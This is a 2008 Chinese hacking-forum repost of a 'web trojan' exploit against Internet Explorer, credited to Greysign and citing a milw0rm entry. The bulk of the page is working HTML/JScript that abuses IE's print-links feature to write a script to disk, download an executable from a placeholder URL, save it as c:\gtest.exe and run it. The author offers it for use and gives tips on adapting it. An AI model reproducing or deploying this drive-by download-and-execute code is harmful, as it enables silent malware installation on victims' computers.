您现在的位置: 骇客基地 >> 黑客文章 >> 黑客攻防 >> 黑客编程 >> 正文

IE0DAY网马
骇客基地 阅读: 时间:2008-5-26 8:11:59 来源:www.hookbase.com
    

这个漏洞参考http://www.milw0rm.com/exploits/5619

Author: Greysign
2008-5-24
http://www.scanw.com/blog

哈哈。标题吸引吗。
修改代码请注意不能使用双引号”,注意不能跨域,还有一些其他零碎的问题自己调试吧。
这个漏洞执行后可以远程下载任意文件并执行。
第一次写网马,只好拿鸡PP搓成鸡胸,这样垃圾的漏洞才能放出来~哈哈。

不过。这个漏洞利用的好也可以玩一玩的。

XML/HTML代码
  1. <html>  
  2. <body>  
  3. Print me with table of links to execute   
  4. <a href="http://www.bla.com?x=b<script defer >  
  5. var    ForWriting    =    2;   
  6. var    strFile    =    'c:\\test2.js';   
  7. var    objFSO    =    new    ActiveXObject('Scripting.FileSystemObject');   
  8. var    objStream    =    objFSO.OpenTextFile(strFile,ForWriting,true,false);   
  9. objStream.WriteLine('var objArgs = \'http://127.0.0.1/test.exe\';');   
  10. objStream.WriteLine('var objargss =\'c:\\\\gtest.exe\';');   
  11. objStream.WriteLine('var sGet=new ActiveXObject(\'ADODB.Stream\');');   
  12. objStream.WriteLine('var xGet = false;');   
  13. objStream.WriteLine('try {');   
  14. objStream.WriteLine('xGet = new XMLHttpRequest();');   
  15. objStream.WriteLine('} ');   
  16. objStream.WriteLine('catch (trymicrosoft) {');   
  17. objStream.WriteLine('try {');   
  18. objStream.WriteLine('     xGet = new ActiveXObject(\'Msxml2.XMLHTTP\');');   
  19. objStream.WriteLine('} ');   
  20. objStream.WriteLine('catch (othermicrosoft) {');   
  21. objStream.WriteLine('     try {');   
  22. objStream.WriteLine('       xGet = new ActiveXObject(\'Microsoft.XMLHTTP\');');   
  23. objStream.WriteLine('     } ');   
  24. objStream.WriteLine('catch (failed) {');   
  25. objStream.WriteLine('       xGet = false;');   
  26. objStream.WriteLine('     }');   
  27. objStream.WriteLine('}');   
  28. objStream.WriteLine('}');   
  29. objStream.WriteLine('xGet.Open (\'GET\',objArgs.toLowerCase(),0);');   
  30. objStream.WriteLine('xGet.Send();');   
  31. objStream.WriteLine('sGet.Mode=3;');   
  32. objStream.WriteLine('sGet.Type=1;');   
  33. objStream.WriteLine('sGet.Open();');   
  34. objStream.WriteLine('sGet.Write (xGet.ResponseBody);');   
  35. objStream.WriteLine('sGet.SaveToFile (objargss.toLowerCase(),2);');   
  36. objStream.WriteLine('var x=new ActiveXObject(\'WScript.Shell\');');   
  37. objStream.WriteLine('x.Run(objargss);');   
  38. objStream.Close();   
  39. var    objShell    =    new    ActiveXObject('wscript.shell');   
  40. objShell.Run(strFile);   
  41. </script>a.c<u>o</u>m"></a>  
  42. <script>window.print();</script>  
  43. </body>  
  44. </html>  
今天广告
参与评论:
注意事项:
【IE0DAY网马】文章由骇客基地网上搜集,其立场行为并不代表本站。
如果您发现该文章若无意中侵犯到您的权利,请联系我们!
未经本站明确许可,任何网站不得非法盗链及抄袭本站资源;如引用页面,请注明来自本站,谢谢您的支持!
最近更新
最新推荐
     
 
黑客首页 | 服务指南 | 软件发布  | 关于我们 | 本站声明  | 隐私声明 | 诚征英才 | 网站地图 | 友情链接 |
 
 
中国·黑客·骇客·基地 请使用IE6.0版本, 分辩率1024×768进行浏览 www.hookbase.com 站长:利客 Email:hookbase@163.com
Copyright © 2004-2009 All Rights Reserved. 粤ICP备05000985号